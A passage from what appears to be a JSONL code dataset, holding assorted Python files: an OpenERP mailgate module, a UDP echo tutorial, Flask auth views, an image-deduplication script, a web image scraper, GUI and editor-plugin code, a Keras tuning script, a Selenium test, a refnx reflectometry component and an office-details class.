msg_actions:\n if msg_actions['state'] in ['draft','close','cancel','open','pending']:\n act = 'do_' + msg_actions['state']\n \n for k1,k2 in [('cost','planned_hours')]:\n try:\n data[k2] = float(msg_actions[k1])\n except:\n pass\n\n if 'priority' in msg_actions:\n if msg_actions['priority'] in ('1','2','3','4','5'):\n data['priority'] = msg_actions['priority']\n \n self.write(cr, uid, [id], data)\n getattr(self,act)(cr, uid, [id])\n return True\n\n def message_followers(self, cr, uid, ids, context=None):\n res = {}\n if isinstance(ids, (str, int, long)):\n select = [ids]\n else:\n select = ids\n for task in self.browse(cr, uid, select, context=context):\n user_email = (task.user_id and task.user_id.address_id and task.user_id.address_id.email) or False\n res[task.id] = [user_email]\n return res\n\n def msg_send(self, cr, uid, id, *args, **argv):\n return True\n \n def _history(self, cr, uid, cases, keyword, history=False, subject=None, email=False, details=None, email_from=False, message_id=False, attach=[], context=None):\n mailgate_pool = self.pool.get('mailgate.thread')\n return mailgate_pool.history(cr, uid, cases, keyword, history=history,\\\n subject=subject, email=email, \\\n details=details, email_from=email_from,\\\n message_id=message_id, attach=attach, \\\n context=context)\n \n def do_draft(self, cr, uid, ids, *args, **kwargs):\n res = super(project_tasks, self).do_draft(cr, uid, ids, *args, **kwargs)\n tasks = self.browse(cr, uid, ids)\n self._history(cr, uid, tasks, _('Draft'))\n return res\n \n def do_open(self, cr, uid, ids, *args, **kwargs):\n res = super(project_tasks, self).do_open(cr, uid, ids, *args, **kwargs)\n tasks = self.browse(cr, uid, ids)\n self._history(cr, uid, tasks, _('Open'))\n return res\n \n def do_pending(self, cr, uid, ids, *args, **kwargs):\n res = super(project_tasks, self).do_pending(cr, uid, ids, *args, **kwargs)\n tasks = self.browse(cr, uid, ids)\n self._history(cr, uid, tasks, _('Pending'))\n return res\n \n def do_close(self, cr, uid, ids, *args, **kwargs):\n res = super(project_tasks, self).do_close(cr, uid, ids, *args, **kwargs)\n tasks = self.browse(cr, uid, ids)\n for task in tasks:\n if task.state == 'done':\n self._history(cr, uid, tasks, _('Done'))\n return res\n \n def do_cancel(self, cr, uid, ids, *args, **kwargs):\n res = super(project_tasks, self).do_cancel(cr, uid, ids, *args, **kwargs)\n tasks = self.browse(cr, uid, ids)\n self._history(cr, uid, tasks, _('Cancel'))\n return res\n\nproject_tasks()\n# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:\n","sub_path":"addons/project_mailgate/project_mailgate.py","file_name":"project_mailgate.py","file_ext":"py","file_size_in_byte":6158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"358163827","text":"# -*- coding: utf-8 -*-\n# @Time : 18-8-30 下午5:57\n# @Author : xmskf\n# @Email : 84887867@qq.com\n# @File : UDP_Server_test.py\n# @Software: PyCharm\n\n# TCP是建立可靠连接,并且通信双方都可以以流的形式发送数据。\n# 相对TCP,UDP则是面向无连接的协议。\n# 使用UDP协议时,不需要建立连接,只需要知道对方的IP地址和端口号,\n# 就可以直接发数据包。但是,能不能到达就不知道了。\n# 虽然用UDP传输数据不可靠,但它的优点是和TCP比,速度快,\n# 对于不要求可靠到达的数据,就可以使用UDP协议。\n# 我们来看看如何通过UDP协议传输数据。和TCP类似,\n# 使用UDP的通信双方也分为客户端和服务器。服务器首先需要绑定端口\n\nimport socket\n\ns = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n# 绑定端口:\ns.bind(('127.0.0.1', 9999))\n\n# 创建Socket时,SOCK_DGRAM指定了这个Socket的类型是UDP。绑定端口和TCP一样,\n# 但是不需要调用listen()方法,而是直接接收来自任何客户端的数据:\n\nprint('Bind UDP on 9999...')\nwhile True:\n # 接收数据:\n data, addr = s.recvfrom(1024)\n print('Received from %s:%s.' % addr)\n s.sendto(b'Hello, %s!' % data, addr)\n\n# recvfrom()方法返回数据和客户端的地址与端口,\n# 这样,服务器收到数据后,直接调用sendto()就可以把数据用UDP发给客户端���\n\n\n# 小结\n# UDP的使用与TCP类似,但是不需要建立连接。\n# 此外,服务器绑定UDP端口和TCP端口互不冲突,\n# 也就是说,UDP的9999端口与TCP的9999端口可以各自绑定。","sub_path":"src/UDP_Server_test.py","file_name":"UDP_Server_test.py","file_ext":"py","file_size_in_byte":1632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"577249808","text":"from flask_login import login_manager\nfrom app.models import User\nfrom flask.globals import session\nimport flask_login\nfrom app.auth.forms import LoginForm\nfrom flask import Blueprint\nfrom flask_login import login_user, logout_user, login_required\nfrom flask import render_template, redirect, request, url_for, flash\nfrom ..database import users_db\nfrom ..plugins import login_manager\n\nauth_bp = Blueprint('auth', __name__)\n\n\n@login_manager.user_loader\ndef load_user_auth(userName):\n data = users_db.get_user(userName)\n return User(data) if data is not None else data\n\n\ndef is_valid_cred_auth(user: User):\n return users_db.is_valid_cred(user.data['userName'], user.data['password'])\n\n\n@auth_bp.route('/login', methods=['GET', 'POST'])\ndef login():\n form = LoginForm()\n print(\"Logging in\")\n if form.validate_on_submit():\n user = load_user_auth(form.userName.data)\n print(user)\n if user is not None and is_valid_cred_auth(user):\n login_user(user, remember=True)\n next = request.args.get('next')\n if next is None or not next.startswith('/'):\n next = url_for('index')\n return redirect(next)\n flash('Invalid username or password.')\n return render_template('auth/login.jinja', form=form)\n\n\n@auth_bp.route(\"/logout\")\n@login_required\ndef logout():\n logout_user()\n flash('You have been logged out.')\n return redirect(url_for('index'))\n\n\n@auth_bp.route(\"/whoami\")\n@login_required\ndef whoami():\n return \"Your name is: \" + flask_login.current_user.data['userName']\n","sub_path":"app/auth/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"439627347","text":"import os\nimport time\nimport shutil\n\nstart = time.time()\nfor fn in os.listdir('images/'):\n\tshutil.copy('images/'+fn, 'unique/')\nprint('Time to copy: ', time.time()-start)\n\ntotal_files = len(os.listdir('images/'))\nremoved = 0\n\nwith open('cor.txt') as f:\n\tlines = [ln.strip() for ln in f.readlines()]\n\tfor ln in lines:\n\t\targ = ln.split(' ')\n\t\tf1 = arg[0]\n\t\tf2 = arg[1]\n\t\tif len(arg)!=3:\n\t\t\tcr1 = float(arg[2][:-8])\n\t\t\tif cr1>0.8 and os.path.isfile('unique/'+f2):\n\t\t\t\tos.remove('unique/'+f2)\n\t\t\t\tprint('Deleting file:',f2,'with confidence',cr1)\n\t\t\t\tremoved +=1\n\t\t\tf1 = arg[2][-8:]\n\t\t\tf2 = arg[3]\n\t\t\tcr = float(arg[4])\n\t\telse:\n\t\t\tcr = float(arg[2])\n\t\tif cr>0.8 and os.path.isfile('unique/'+f2):\n\t\t\tos.remove('unique/'+f2)\n\t\t\tprint('Deleting file:',f2,'with confidence',cr)\n\t\t\tremoved+=1\n\nprint('Duplication: ', 100*removed/total_files,'%')\n","sub_path":"scripts/seperate.py","file_name":"seperate.py","file_ext":"py","file_size_in_byte":836,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"179289946","text":"import requests\r\nfrom bs4 import BeautifulSoup\r\n\r\nfor year in range(2015,2021):\r\n res = requests.get(\"https://search.daum.net/search?nil_suggest=btn&w=tot&DA=SBC&q={}%EB%85%84+%EC%98%81%ED%99%94%EC%88%9C%EC%9C%84\".format(year))\r\n res.raise_for_status\r\n soup = BeautifulSoup(res.text,\"lxml\")\r\n\r\n images = soup.find_all(\"img\",attrs={\"class\":\"thumb_img\"})\r\n\r\n for idx,image in enumerate(images):\r\n #print(image[\"src\"])\r\n image_url = image[\"src\"]\r\n if image_url.startswith(\"//\"):\r\n image_url = \"http:\" + image_url\r\n\r\n print(image_url)\r\n image_res = requests.get(image_url)\r\n image_res.raise_for_status()\r\n\r\n with open(\"movie_{}_{}.jpg\".format(year,idx+1),\"wb\") as f:\r\n f.write(image_res.content)\r\n\r\n if idx >= 4:\r\n break\r\n \r\n","sub_path":"pythonWorkspace/webscraping/11_daum_movies.py","file_name":"11_daum_movies.py","file_ext":"py","file_size_in_byte":832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"224248931","text":"\"\"\"\n 测试复选框Checkbutton的用法\n author:Benjamin\n\"\"\"\n\nfrom tkinter import *\n\nchoices = [\"apple\",\n \"banana\",\n \"orange\",\n \"watermelon\"]\nv = []\n\nroot = Tk()\nroot.title(\"Text Checkbutton\")\nroot.geometry(\"300x150\")\n\nframe_choice = LabelFrame(root, text=\"You can get some fruits:\")\nframe_choice.pack(padx=10, pady=10)\n\nfor choice in choices:\n v.append(vars())\n Checkbutton(frame_choice, text=choice, variable=v[-1]).pack(anchor=W)\n\nmainloop()\n","sub_path":"text_tkinter/text_Checkbutton.py","file_name":"text_Checkbutton.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"43149123","text":"# -*- coding: utf-8 -*-\nimport logging\nfrom pyqode.core import api\nfrom pyqode.core.api import Mode\nfrom pyqode.core.api import DelayJobRunner\nfrom pyqode.core.backend import NotConnected\nfrom pyqode.python.backend.workers import Definition, defined_names\nfrom pyqode.core.qt import QtCore\n\n\ndef _logger():\n return logging.getLogger(__name__)\n\n\nclass DocumentAnalyserMode(Mode, QtCore.QObject):\n \"\"\"\n This mode analyses the structure of a document (a tree of\n :class:`pyqode.python.backend.workers.Definition`.\n\n :attr:`pyqode.python.modes.DocumentAnalyserMode.document_changed`\n is emitted whenever the document structure changed.\n\n To keep good performances, the analysis task is run when the application is\n idle for more than 1 second (by default).\n \"\"\"\n #: Signal emitted when the document structure changed.\n document_changed = QtCore.Signal()\n\n def __init__(self, delay=1000):\n Mode.__init__(self)\n QtCore.QObject.__init__(self)\n self._jobRunner = DelayJobRunner(delay=delay)\n #: The list of results (elements might have children; this is actually\n #: a tree).\n self.results = []\n\n def on_state_changed(self, state):\n if state:\n self.editor.blockCountChanged.connect(self._on_line_count_changed)\n self.editor.new_text_set.connect(self._run_analysis)\n else:\n self.editor.blockCountChanged.disconnect(\n self._on_line_count_changed)\n self.editor.new_text_set.disconnect(self._run_analysis)\n\n def _on_line_count_changed(self, e):\n self._jobRunner.request_job(self._run_analysis)\n\n def _run_analysis(self):\n if self.editor and self.editor.toPlainText() and self.editor.file:\n request_data = {\n 'code': self.editor.toPlainText(),\n 'path': self.editor.file.path,\n 'encoding': self.editor.file.encoding\n }\n try:\n self.editor.backend.send_request(\n defined_names, request_data,\n on_receive=self._on_results_available)\n except NotConnected:\n QtCore.QTimer.singleShot(100, self._run_analysis)\n else:\n self.results = []\n self.document_changed.emit()\n\n def _on_results_available(self, status, results):\n if results:\n results = [Definition().from_dict(ddict) for ddict in results]\n self.results = results\n if self.results is not None:\n _logger().debug(\"Document structure changed\")\n self.document_changed.emit()\n\n @property\n def flattened_results(self):\n \"\"\"\n Flattens the document structure tree as a simple sequential list.\n \"\"\"\n ret_val = []\n for d in self.results:\n ret_val.append(d)\n for sub_d in d.children:\n nd = Definition(sub_d.name, sub_d.icon, sub_d.line,\n sub_d.column, sub_d.full_name)\n nd.name = \" \" + nd.name\n nd.full_name = \" \" + nd.full_name\n ret_val.append(nd)\n return ret_val\n","sub_path":"pyqode/python/modes/document_analyser.py","file_name":"document_analyser.py","file_ext":"py","file_size_in_byte":3168,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"641818721","text":"import pandas as pd\nimport keras\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout\nfrom keras.wrappers.scikit_learn import KerasClassifier\nfrom sklearn.model_selection import GridSearchCV\n\nprevisores = pd.read_csv('entradas-breast.csv')\nclasse = pd.read_csv('saidas-breast.csv')\n\ndef criarRede(neurons, drop_rate, lr_rate, clipvalue_rate):\n classificador = Sequential()\n classificador.add(Dense(units = neurons, activation = 'relu', \n kernel_initializer = 'normal', input_dim = 30))\n classificador.add(Dropout(drop_rate))\n classificador.add(Dense(units = neurons, activation = 'relu', \n kernel_initializer = 'normal'))\n classificador.add(Dropout(drop_rate))\n classificador.add(Dense(units = neurons, activation = 'relu', \n kernel_initializer = 'normal'))\n classificador.add(Dropout(drop_rate))\n classificador.add(Dense(units = 1, activation = 'sigmoid'))\n otimizador = keras.optimizers.Adam(lr = lr_rate, decay = 0.0001, clipvalue = clipvalue_rate)\n classificador.compile(optimizer = otimizador, loss = 'binary_crossentropy',\n metrics = ['binary_accuracy'])\n return classificador\n\nclassificador = KerasClassifier(build_fn = criarRede)\nparametros = {'batch_size': [10, 20, 30, 50],\n 'epochs': [100, 120],\n 'neurons': [8, 16, 32],\n 'drop_rate': [0.1, 0.2, 0.3],\n 'lr_rate': [0.001, 0.005],\n 'clipvalue_rate': [0.3, 0.5, 0.6]}\n\ngrid_search = GridSearchCV(estimator = classificador,\n param_grid = parametros,\n scoring = 'accuracy',\n cv = 5)\ngrid_search = grid_search.fit(previsores, classe)\nmelhores_parametros = grid_search.best_params_\nmelhor_precisao = grid_search.best_score_","sub_path":"1 - Redes Neurais Artificiais/4 - Classificação binária/Tarefa1-tuning.py","file_name":"Tarefa1-tuning.py","file_ext":"py","file_size_in_byte":1867,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"285371019","text":"from selenium import webdriver\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom basetest import SeleniumTestCase\nfrom webdriver_manager.chrome import ChromeDriverManager\nfrom selenium.common.exceptions import NoSuchElementException\nfrom selenium.webdriver.common.action_chains import ActionChains\n\nchromedriver_path = 'C:/Users/laure/bin/chromedriver.exe'\nbrowser = webdriver.Chrome(ChromeDriverManager().install())\n\n#User hears about a blog website they want to visit. They head over to its homepage.\nbrowser.get('https://laurenalie.pythonanywhere.com/')\n\n#User navigates to Featured page\ndef goToFeatured():\n menu = browser.find_element_by_xpath(\"//i[@class='fas fa-ellipsis-v']\")\n browser.implicitly_wait(2)\n browser.execute_script(\"arguments[0].click();\", menu) \n try:\n featured = browser.find_element_by_link_text(\"Featured\")\n browser.execute_script(\"arguments[0].click();\", featured)\n current = browser.current_url\n assert current == \"https://laurenalie.pythonanywhere.com/#featured\"\n except NoSuchElementException:\n print(\"failed to go to Featured page\")\n pass\n\n#User wants to see all featured posts so flicks through carousel (both left and right)\n\ndef checkCarouselMovement():\n #Check right movement\n for i in range(3):\n next = browser.find_element_by_xpath('//a[@class=\"right carousel-control\"]')\n browser.execute_script(\"arguments[0].click();\", next)\n browser.implicitly_wait(3)\n #Check left movement\n for i in range(3):\n prev = browser.find_element_by_xpath('//a[@class=\"left carousel-control\"]')\n browser.execute_script(\"arguments[0].click();\", prev)\n browser.implicitly_wait(3)\n \n\n#User wants to check out one of the featured posts so clicks on it to read more.\n\ndef readFeatured():\n #Click on post\n try:\n image = browser.find_element_by_tag_name(\"img\")\n browser.execute_script(\"arguments[0].click();\", image) \n current = browser.current_url\n assert \"https://laurenalie.pythonanywhere.com/post\" in current\n except NoSuchElementException:\n print(\"failed to go to post by clicking on image\")\n\n #User returns to Home by clicking on home icon\n try:\n home = browser.find_element_by_xpath(\"//i[@class='fa fa-home']\")\n browser.execute_script(\"arguments[0].click();\", home) \n current = browser.current_url\n assert current == \"https://laurenalie.pythonanywhere.com/\"\n except NoSuchElementException:\n print(\"failed to return to homepage\")\n\n\n \n\n\ngoToFeatured()\ncheckCarouselMovement()\nreadFeatured()\nbrowser.quit()\nprint(\"Successfully navigated Featured Posts\")","sub_path":"blog/tests/featured_test.py","file_name":"featured_test.py","file_ext":"py","file_size_in_byte":2681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"388807319","text":"import numpy as np\r\n\r\nfrom refnx.reflect import Structure, Component\r\nfrom refnx.analysis import Parameter, Parameters, possibly_create_parameter\r\nfrom scipy import special\r\nimport time\r\nfrom methodtools import lru_cache #functools doesn't work for classmethods?\r\n\r\nEPS = np.finfo(float).eps\r\n\r\n\r\nclass VFP(Component):\r\n \"\"\"\r\n A hack of refnx's spline component.\r\n \r\n ### how does this work? ###\r\n \r\n In ReflectModel, the reflectivity function is used to calculate the generative for a given set of parameters.\r\n The generative is used when fitting a dataset, when carrying out posterior sampling & when estimating the model evidence.\r\n \r\n The reflectivity function requires a slab representation \r\n (an array of slab (shape = 2+N, 4 where N is number of layers) parameters - thicknesses, roughnesses etc) \r\n of the structure.\r\n \r\n This slab representation is returned by the structure.slab() method, \r\n which uses the slab method of each component within a structure to return a concatenated array of slabs.\r\n \r\n This means, the VFP component needs a slab method which will return an array of microslabs to ReflectModel.\r\n In the slab method we use the __call__ method of the VFP component to do the calculation.\r\n \r\n Here, the __call__ method of Spline has been altered to calculate\r\n a new array of distances across the interface (zeds), and then calculate\r\n volume fractions profiles for all layers given the thickness and roughness parameters.\r\n SLDs for each layer are calculated using the SLD parameters and the\r\n calculated volume fractions.\r\n These are then added together to create an array of SLDs the same length\r\n as the zeds array.\r\n These sld values are then returned in the __call__ method, which feeds through\r\n to the slabs sld.\r\n No interpolation occurs in this class.\r\n The microslabs are 0.5 Å each, as defined by self.max_delta_z.\r\n \r\n Parameters\r\n ----------\r\n extent : float or Parameter\r\n Total length of volume fraction profiles\r\n SLDs : array of floats or Parameters \r\n Values of SLDs\r\n thicknesses : tuple of floats or Parameters\r\n Thicknesses of layers - these are used to determine the width of the volume fraction profiles.\r\n roughnesses : tuple of floats or Parameters\r\n Roughnesses of layers - these are used to determine the width of the volume fraction profiles.\r\n contrast : string\r\n string used to select which SLDs are used to calculate the scattering length density profile.\r\n \"\"\"\r\n\r\n def __init__(\r\n self,\r\n extent,\r\n SLDs,\r\n thicknesses,\r\n roughnesses,\r\n contrast,\r\n ):\r\n super().__init__() #inherit the Component class.\r\n self.SLDs = SLDs\r\n self.thicknesses = thicknesses #tuples for hashing...\r\n self.roughnesses = roughnesses\r\n self.contrast = contrast\r\n self.name = \"\"\r\n \r\n #hard code in some other values\r\n self.max_delta_z = 0.5\r\n \r\n #select contrasts to use\r\n if self.contrast == 'dd_d2o_up':\r\n self.SLDs = np.array([SLDs[i] for i in [0, 1, 2, 4, 7, 9]])\r\n elif self.contrast == 'dd_d2o_down':\r\n self.SLDs = np.array([SLDs[i] for i in [0, 1, 3, 5, 7, 9]])\r\n elif self.contrast == 'dd_h2o_up':\r\n self.SLDs = np.array([SLDs[i] for i in [0, 1, 2, 4, 6, 10]])\r\n elif self.contrast == 'dd_h2o_down':\r\n self.SLDs = np.array([SLDs[i] for i in [0, 1, 3, 5, 6, 10]])\r\n elif self.contrast == 'hd_d2o_up':\r\n self.SLDs = np.array([SLDs[i] for i in [0, 1, 2, 4, 8, 11]])\r\n elif self.contrast == 'hd_d2o_down':\r\n self.SLDs = np.array([SLDs[i] for i in [0, 1, 3, 5, 8, 11]])\r\n\r\n self.extent = possibly_create_parameter(\r\n extent, name=\"%s - VFP extent\", units=\"Å\"\r\n )\r\n \r\n #initialise the SLDs and zeds.\r\n self.vs = self.create_vs()\r\n \r\n self.dz = self.get_dzs(self.extent.value, self.max_delta_z)\r\n\r\n @lru_cache(maxsize=2)\r\n @classmethod\r\n def get_dzs(cls, ex, mxdz):\r\n \"\"\"\r\n This function finds the thickness of each microslice, \r\n while also finding the thickness of any larger slab.\r\n \"\"\"\r\n def consecutive(indic, stepsize=1): #internal func for finding consecutive indices.\r\n \"\"\"\r\n Splits indic into sub arrays where the difference between neighbouring units in indic is not 1.\r\n \"\"\"\r\n return np.split(indic, np.where(np.diff(indic) != stepsize)[0]+1)\r\n \r\n delta_step = ex/(cls.knots-1) #gives the thickness of the microslabs (approx 0.5 Å).\r\n \r\n if not cls.ind[0].any(): #if there are no indices of where volume fraction is approx equal, all slab thicknesses = delta_step.\r\n dzs = np.ones(cls.knots)*delta_step\r\n \r\n else:\r\n indexs = consecutive(np.array(cls.ind)[0]) #list of n arrays (n is the number of zones where there is little difference)\r\n \r\n indexs_diffs = [j[-1]-j[0] for j in indexs] #find length of each zone and return in a list.\r\n indexs_starts = [j[0] for j in indexs] #where does each zone start?\r\n indexs_ends = [j[-1] for j in indexs] #where does each zone start?\r\n \r\n index_gaps = np.array([j - indexs_ends[i-1] for i, j in enumerate(indexs_starts) if i > 0])\r\n \r\n new_knots = (cls.knots) - (np.array(indexs_diffs).sum()+len(indexs)) #number of knots is now reduced.\r\n dzs = np.empty(int(new_knots)) #init an array for collecting dz values.\r\n new_indexs_starts = [indexs_starts[0] + index_gaps[:i].sum() for i, j in enumerate(indexs)]\r\n \r\n dzs = np.ones(new_knots)*delta_step #make all values delta step.\r\n if len(new_indexs_starts) > 1:\r\n for i, j in enumerate(new_indexs_starts): #find places where delta step needs to be altered.\r\n dzs[j] = ((indexs_diffs[i]+1)*delta_step)+dzs[j-1]\r\n else:\r\n dzs[int(new_indexs_starts[0])] = ((indexs_diffs[0]+1)*delta_step)+dzs[int(new_indexs_starts[0]-1)] #alter dz in the one place required.\r\n return dzs\r\n \r\n def get_x_and_y_scatter(self):\r\n \"\"\" \r\n Function that returns the middle z and SLD of each microslab.\r\n \"\"\"\r\n y = np.array([float(i) for i in self.create_vs()])\r\n x = np.delete(np.array([float(i) for i in self.get_zeds(self.roughnesses, self.thicknesses)]), self.indices)\r\n return x, y\r\n \r\n @classmethod\r\n def get_zeds(cls, rough, thick):\r\n \"\"\"\r\n Calculate an array of zeds for volume fraction calculations.\r\n \"\"\"\r\n cls.knots = int(cls.ex/cls.mxdz) #number of points to calculate z at.\r\n zstart = -5 - 4 * rough[0] #where does z start?\r\n zend = 5 + np.cumsum(thick)[-1] + 4 * rough[-1] #where does z end?\r\n zed = np.linspace(float(zstart), float(zend), num=cls.knots) #now return the array.\r\n return zed\r\n \r\n @classmethod\r\n def get_erf(cls, layer_choice, loc, rough, thick):\r\n \"\"\"\r\n Calculate 1-F_{i} for a given layer (defined by layer_choice)\r\n \"\"\"\r\n erf = (1-np.array([0.5*(1 + special.erf((float(i)-loc[layer_choice])/\r\n float(rough[layer_choice])/np.sqrt(2))) for i in cls.get_zeds(rough, thick)]))\r\n return erf \r\n \r\n @lru_cache(maxsize=2)\r\n @classmethod\r\n def get_vfs(cls, rough, thick, ex, mxdz):\r\n \"\"\"\r\n This function creates the volume fraction profile for a given set of thicknesses, & roughnesses.\r\n It is a classmethod so that the result is shared between objects of the same class.\r\n This is useful as the different contrasts will share the same volume fraction profile\r\n for a given set of thickness and roughness parameters.\r\n As such, we can use the lru_cache capability to store the volume fraction profile so that\r\n it only needs calculating once per set of contrasts.\r\n \"\"\"\r\n rough = np.array(rough)\r\n thick = np.array(thick)\r\n loc = np.cumsum(thick)\r\n #share the total length of vf profile & the microslab thickness across the class\r\n cls.ex = ex\r\n cls.mxdz = mxdz\r\n \r\n #hard code in the layers we want\r\n #create a vf array of length of N layers + 2.\r\n #the integer supplied in the brackets is the layer_choice. 0 is fronting.\r\n #follows Equation S9 in SI, although note that cls.get_erf(i, loc, rough, thick) = 1-F_{i}\r\n vfs = np.array([cls.get_erf(0, loc, rough, thick)*cls.get_erf(1, loc, rough, thick), #Si\r\n (1-cls.get_erf(0, loc, rough, thick))*cls.get_erf(1, loc, rough, thick), #SiO2\r\n (1-cls.get_erf(1, loc, rough, thick))*cls.get_erf(2, loc, rough, thick), #Fe\r\n (1-cls.get_erf(2, loc, rough, thick))*cls.get_erf(3, loc, rough, thick), #FeOx\r\n (1-cls.get_erf(2, loc, rough, thick))*(1-cls.get_erf(3, loc, rough, thick))*cls.get_erf(4, loc, rough, thick), #GMO\r\n (1-cls.get_erf(2, loc, rough, thick))*(1-cls.get_erf(3, loc, rough, thick))*(1-cls.get_erf(4, loc, rough, thick))]) #Solv\r\n \r\n #There may be portions of a layer's vf profile that sits above 0 (at say 1) for an extended length.\r\n #Therefore, we can merge these microslabs into one to speed up calculations.\r\n cls.ind = np.nonzero((np.abs(np.diff(vfs[2])) < 1e-5) & (vfs[2][:-1] > 0.5)) #look for insignificant differences in Fe vf, when vf is > 0.5.\r\n reduced_vfs = np.delete(vfs, cls.ind, 1)\r\n return reduced_vfs, cls.ind\r\n \r\n def get_slds(self):\r\n \"\"\"\r\n This function returns the total sld for a given contrast.\r\n \r\n The thicknesses and roughnesses are used to generate the volume fraction profile\r\n in combination with the total length of the volume fraction profile and the microslab width.\r\n \r\n After, the volume fraction profiles is multiplied by the sld values to create a SLD profile for a given contrast.\r\n \"\"\"\r\n \r\n #get floats of parameters so hashing recognition works.\r\n thicks = tuple(np.array([float(i) for i in self.thicknesses]))\r\n roughs = tuple(np.array([float(i) for i in self.roughnesses]))\r\n \r\n volfracs, self.indices = self.get_vfs(roughs, thicks, self.extent.value, self.max_delta_z)\r\n sld_values = [float(i) for i in self.SLDs]\r\n \r\n #Equation S11 in the SI.\r\n self.sld_list = volfracs.T*sld_values\r\n tot_sld = np.sum(self.sld_list, 1)\r\n return tot_sld\r\n \r\n def create_vs(self): #creates parameters that are constrained to self.get_slds()\r\n slds_arr = self.get_slds()\r\n return slds_arr\r\n \r\n def __repr__(self):\r\n s = (\"VFP({extent!r}, {SLDs!r}, {thicknesses!r}, {roughnesses!r}, {contrast!r}\")\r\n return s.format(**self.__dict__)\r\n\r\n def __call__(self):\r\n \"\"\"\r\n Here we get the slds from the volume fractions,\r\n then we find the average slds between consecutive points.\r\n \"\"\"\r\n #recalculate slds.\r\n #caching is not shared between processes.\r\n self.vs = self.create_vs() #this returns the SLD profile for a given contrast.\r\n self.dz = self.get_dzs(self.extent.value, self.max_delta_z) #returns the thickness of each slab.\r\n \r\n average_slds = 0.5*np.diff(self.vs)+self.vs[:-1]\r\n return_slds = np.append(average_slds, self.vs[-1])\r\n return return_slds, self.dz\r\n\r\n\r\n @property\r\n def parameters(self):\r\n p = Parameters(name=self.name)\r\n p.extend([self.extent])\r\n return p\r\n \r\n def p_equivs(self):\r\n #as slds and dzs are not automatically returned as parameters\r\n #use this function to return the parameter values after fitting.\r\n dzs_par_list = Parameters(name='dzs')\r\n vs_par_list = Parameters(name='slds')\r\n for i, j in enumerate(self.dz):\r\n pdz = Parameter(value=j)\r\n dzs_par_list.append(pdz)\r\n pvs = Parameter(value=self.vs[i])\r\n vs_par_list.append(pvs)\r\n p = Parameters(name=self.name)\r\n p.extend([self.extent, dzs_par_list, vs_par_list])\r\n return p\r\n \r\n def vfs_for_display(self):\r\n \"\"\"\r\n Useful function for displaying volume fractions. \r\n Use in conjunction with first output of get_x_and_y_scatter to plot.\r\n \"\"\"\r\n thicks = tuple(np.array([float(i) for i in self.thicknesses]))\r\n roughs = tuple(np.array([float(i) for i in self.roughnesses]))\r\n \r\n volfracs = self.get_vfs(roughs, thicks, self.extent.value, self.max_delta_z)[0]\r\n \r\n return volfracs\r\n \r\n def logp(self):\r\n return 0\r\n\r\n\r\n def slabs(self, structure=None):\r\n \"\"\"\r\n Slab representation of the spline, as an array\r\n\r\n Parameters\r\n ----------\r\n structure : refnx.reflect.Structure\r\n The Structure hosting this Component\r\n \"\"\"\r\n if structure is None:\r\n raise ValueError(\"Spline.slabs() requires a valid Structure\")\r\n \r\n slds, thicks = self()\r\n slabs = np.zeros((len(thicks), 5))\r\n slabs[:, 0] = thicks\r\n slabs[:, 1] = slds\r\n return slabs","sub_path":"NR/GMO_water/vfp_M1.py","file_name":"vfp_M1.py","file_ext":"py","file_size_in_byte":13537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"137764174","text":"__author__ = 'nsheridan'\n\nimport pickle\nf = open(r'C:\\temp\\offices.pkl', 'rb')\nebrd_offices = pickle.load(f)\nf.close()\n\nclass Office: # Note that classes should always have a name in title case (i.e. \"Office\" not \"office\")\n \"\"\"\n Represents a single production entity on the network\n attributes:\n location (city of origin)\n country (country of origin)\n locCode (three letter office code used in device nomenclature)\n vpnNum (office number typically represented in second octect)\n timeZone (offset from UTC)\n linkNum (number of links)\n wanSpeed (bit rate of local tail circuit)\n\n Note that this class has no methods!\n \"\"\"\n\n def __init__(self, office):\n \"\"\"\n\n Define constructors for Class\n\n - This a accessible outside of the Class. For example, say we instantiated a class \"ashgabat\",\n we could access the list ['Turkmenistan', 'ASB', '220', '5', '1', '512'] by calling:\n\n ashgabat.office_details\n\n \"\"\"\n self.office = office # Expect a string, e.g. \"Ashgabat\" (note this just a string!)\n self.office_details = ebrd_offices[office] # This is a list relating to the office, i.e.\n # if office = \"Ashgabat\" then this would equal\n # ['Turkmenistan', 'ASB', '220', '5', '1', '512']\n\n self.country = self.office_details[0]\n self.loc_code = self.office_details[1]\n self.vpn_num = self.office_details[2]\n self.time_zone = self.office_details[3]\n self.link_num = self.office_details[4]\n self.wan_speed = self.office_details[5]\n\n '''\n Note that the \"self\" part indicates the object you're creating. For example, if you did this:\n\n ashgabat = Office(\"Ashgabat\")\n\n ... this would create the object \"ashgabat\". This is the \"self\" part, so if you wanted to know the\n location you would then call:\n\n ashgabat.location\n\n ... which would return the value \"Turkmenistan\". Think of the \"self\" part as being the template\n which is replaced with the string specified (in this case \"ashgabat\", *not* \"Ashgabat\" because\n this is the key to the dictionary!).\n\n '''\n\n\n def show_details(self):\n print('\\n')\n display_string = \"Showing the object details \" + str(self) + \" based on \" + self.office\n print(len(display_string) * '#')\n print(display_string)\n print(len(display_string) * '#')\n print('\\n')\n # ... now let's call with attributes for the instantiated class:\n print(\"The office is = \" + self.office)\n print(\"The country is = \" + self.country)\n print(\"The loc_code is = \" + self.loc_code)\n print(\"The vpn_num is = \" + self.vpn_num)\n print(\"The time_zone is = \" + self.time_zone)\n 